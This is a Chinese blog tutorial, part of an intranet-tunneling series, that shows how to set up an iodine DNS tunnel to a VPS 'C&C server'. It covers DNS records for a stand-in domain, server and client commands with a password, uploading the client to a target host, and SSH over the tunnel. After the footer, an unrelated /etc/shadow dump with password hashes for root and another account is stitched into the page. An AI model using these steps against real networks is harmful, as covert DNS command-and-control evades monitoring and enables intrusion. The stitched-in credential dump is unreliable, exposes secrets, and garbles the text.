linux查看dns_内网转发及隐蔽隧道 | 应用层隧道技术之使用DNS搭建隧道(iodine)

应用层隧道技术之使用DNS搭建隧道(iodine) d74280428d02a7f5ee3494d503ca9f8a.png

目录

    iodine

    使用iodin搭建隧道

        (1):部署域名解析

        (2):安装并启动服务端

        (3):安装并启动客户端

        (4):使用DNS隧道

d74280428d02a7f5ee3494d503ca9f8a.png

➩iodine

iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。

与同类工具相比,iodine具有如下特点:

  • 不会对下行数据进行编码

  • 支持多平台(Linux、Windows、MacOS)

  • 支持16个并发连接

  • 支持强密码机制

  • 支持同网段隧道IP地质(不同于服务器一客户端网段)

  • 支持多种DNS记录类型

  • 提供了丰富的隧道质量检测措施

使用iodin搭建隧道

1):部署域名解析

首先,用一台公网的Linux系统的VPS作为C&C服务器,并准备好一个可以配置的域名(这里我们假设是hack.com)。然后,去配置域名的记录。首先创建记录A,将自己的域名 www.hack.com 解析到VPS服务器地址。然后,创建NS记录,将 test.hack.com 指向 www.hack.com 。

  • 第一条A类解析是在告诉域名系统,www.hack.com 的IP地址是 xx.xx.xx.xx 。

  • 第二条NS解析是在告诉域名系统,想要知道 test.hack.com 的IP地址,就去问 www.hack.com 。

1ca362ba42269961f31b896aaca867a4.png

为什么要设置NS类型的记录呢?因为NS类型的记录不是用于设置某个域名的DNS服务器的,而是用于设置某个子域名的DNS服务器的。

如何验证域名解析设置是否成功?
在随便一台电脑上ping域名 www.hack.com ,若能ping通,且显示的IP地址是我们配置的VPS的地址,说明第一条A类解析设置成功并已生效。

a4140e6f6d5c1896c2e7c435817b40b7.png

然后在我们的VPS上执行以下命令监听UDP53端口

tcpdump -n -i eth0 udp dst port 53

在任意一台机器上执行  nslookup test.hack.com 命令,如果在我们的VPS监听的端口有查询信息,说明第二条记录设置成功

555785a794dd72170c605133395d31e4.png

(2):安装并启动服务端

Kali中默认安装了iodine,但是我们这里用的服务端是Centos7系统,可以执行命令:yum -y install iodine 安装。如果是Windows系统,可以安装编译好的对应版本的iodine。

ce0280f4f51cd6a8d6ffeb3cfa76fa61.png

执行以下命令启动服务端

iodined -f -c -P root@123456 192.168.100.1 test.hack.com -DD    -f:在前台运行    -c:禁止检查所有传入请求的客户端IP地址    -P:指定密码    -D:指定调试级别。-DD指第二级,D的数量随等级增加    这里的192.168.10.1是自定义的局域网虚拟IP地址

15f4bdb4dd998f070c155b0bd197163a.png

启动完后,可以通过iodine检查页面:https://code.kryo.se/iodine/check-it/  检查配置是否正确。如下,表示设置成功

93f0d1eca7b28a7d82588c11a8865031.png

服务端启动成功后,VPS上多了一块dns0的网卡,ip为我们设置的192.168.100.1

f64dce3f8da210b15faa0a8803177f4c.png

(3):安装并启动客户端

Windows系统

如果是Windows系统,直接执行下面命令启动客户端,但是启动的过程中,会遇到杀毒软件的报毒,并且需要管理员权限执行命令才可以启动

iodine.exe -f -P root@123456 test.hack.com

715fae01119dc937fc0ec91e657af79f.png

78c629995f3fb1ae9d5e780bd97b6c7a.png

那我们现在就以管理员权限运行该命令,如图,DNS隧道建立成功

d62e7e5ae88b324b34c2ec92b8b1672c.png

查看客户端网卡,多了一张以太网2,IP为192.168.100.2。此时,我们的VPS和客户端处在同一个逻辑的局域网内。

5039252cb4eac2188091db28281dbbee.png

但是此时ping服务端的192.168.100.1地址却ping不通,不知为何,客户端如果是Linux则不会有此情况。

639c5de00a43aedb90c8c5d472c9b9b2.png

Linux系统

如果是Linux系统,先安装iodine。上传iodlie客户端到目标主机,解压,进入目录安装

cd iodine-0.7.0/make && make install

4f51948ec014f5f08c7a99c6266edc0a.png

然后执行下面命令连接服务端(需要root权限),如图连接成功。

iodine -f -P root@123456 test.hack.com

070f2c5e10791522bbcf09d382347ac1.png

连接成功后,客户端上新建了一个dns0的网卡,IP地址为192.168.100.2

8abac047a01424bd853ab9ba9fea6842.png

然后ping服务端地址192.168.100.1,能互通!

dfc28a7bfce9df4d963aee5bcab0d488.png

(4):使用DNS隧道

客户端和服务端连接成功后,由于客户端和服务端处在一个逻辑的局域网中,所以可以直接通。

服务端SSH连接客户端

b90fc68258de985815e309cf05e75369.png

客户端SSH连接服务端

809f01328be36b88e168e60e7d8c1b75.png

其他服务也是一样,可以直接指定虚拟局域网的IP和端口就可连接。

相关文章:

内网转发及隐蔽隧道 | 使用DNS进行命令控制(DNS-Shell)

内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

内网转发及隐蔽隧道 | ICMP隧道(pingTunnel/IcmpTunnel)

内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道

内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

内网转发及隐蔽隧道 | 端口转发和端口映射

内网转发及隐蔽隧道 | 内网转发工具的使用

内网转发及隐蔽隧道 | FRP的使用

内网转发及隐蔽隧道 | NPS的使用


责编:vivian

来源:谢公子博客

78f492c7c94b91fe9d69f2433aa7c988.png 如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
root:$6$RMpgG8z.$GrGzDK0J1/uXc/Z2WIp6WgIYEB6Bi/Sw2aCc86U2E.BK80mszROf4K1ZB172DOQzgRb6U/2jGPh/8rwXQsbM3/:17277:0:99999:7::: daemon:*:17272:0:99999:7::: bin:*:17272:0:99999:7::: sys:*:17272:0:99999:7::: sync:*:17272:0:99999:7::: games:*:17272:0:99999:7::: man:*:17272:0:99999:7::: lp:*:17272:0:99999:7::: mail:*:17272:0:99999:7::: news:*:17272:0:99999:7::: uucp:*:17272:0:99999:7::: proxy:*:17272:0:99999:7::: www-data:*:17272:0:99999:7::: backup:*:17272:0:99999:7::: list:*:17272:0:99999:7::: irc:*:17272:0:99999:7::: gnats:*:17272:0:99999:7::: nobody:*:17272:0:99999:7::: systemd-timesync:*:17272:0:99999:7::: systemd-network:*:17272:0:99999:7::: systemd-resolve:*:17272:0:99999:7::: systemd-bus-proxy:*:17272:0:99999:7::: _apt:*:17272:0:99999:7::: mysql:!:17272:0:99999:7::: epmd:*:17272:0:99999:7::: Debian-exim:!:17272:0:99999:7::: uuidd:*:17272:0:99999:7::: rwhod:*:17272:0:99999:7::: redsocks:!:17272:0:99999:7::: usbmux:*:17272:0:99999:7::: miredo:*:17272:0:99999:7::: Debian-snmp:!:17272:0:99999:7::: ntp:*:17272:0:99999:7::: stunnel4:!:17272:0:99999:7::: sslh:!:17272:0:99999:7::: rtkit:*:17272:0:99999:7::: postgres:*:17272:0:99999:7::: dnsmasq:*:17272:0:99999:7::: messagebus:*:17272:0:99999:7::: iodine:*:17272:0:99999:7::: arpwatch:!:17272:0:99999:7::: couchdb:*:17272:0:99999:7::: avahi:*:17272:0:99999:7::: sshd:*:17272:0:99999:7::: colord:*:17272:0:99999:7::: saned:*:17272:0:99999:7::: speech-dispatcher:!:17272:0:99999:7::: pulse:*:17272:0:99999:7::: king-phisher:*:17272:0:99999:7::: Debian-gdm:*:17272:0:99999:7::: dradis:*:17272:0:99999:7::: beef-xss:*:17272:0:99999:7::: xrdp:!:17472:0:99999:7::: lightdm:*:17472:0:99999:7::: ctf:$6$d1Y17YhS$P1G.pKFO6VKvKx.y0H7nP5kXAHUAhj6hYroEA.ThT1/kErw37IhVclt.UWCFXrfq/sEZk1jhb52KlPWidJKpp0:17473:0:99999:7:::
07-13

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值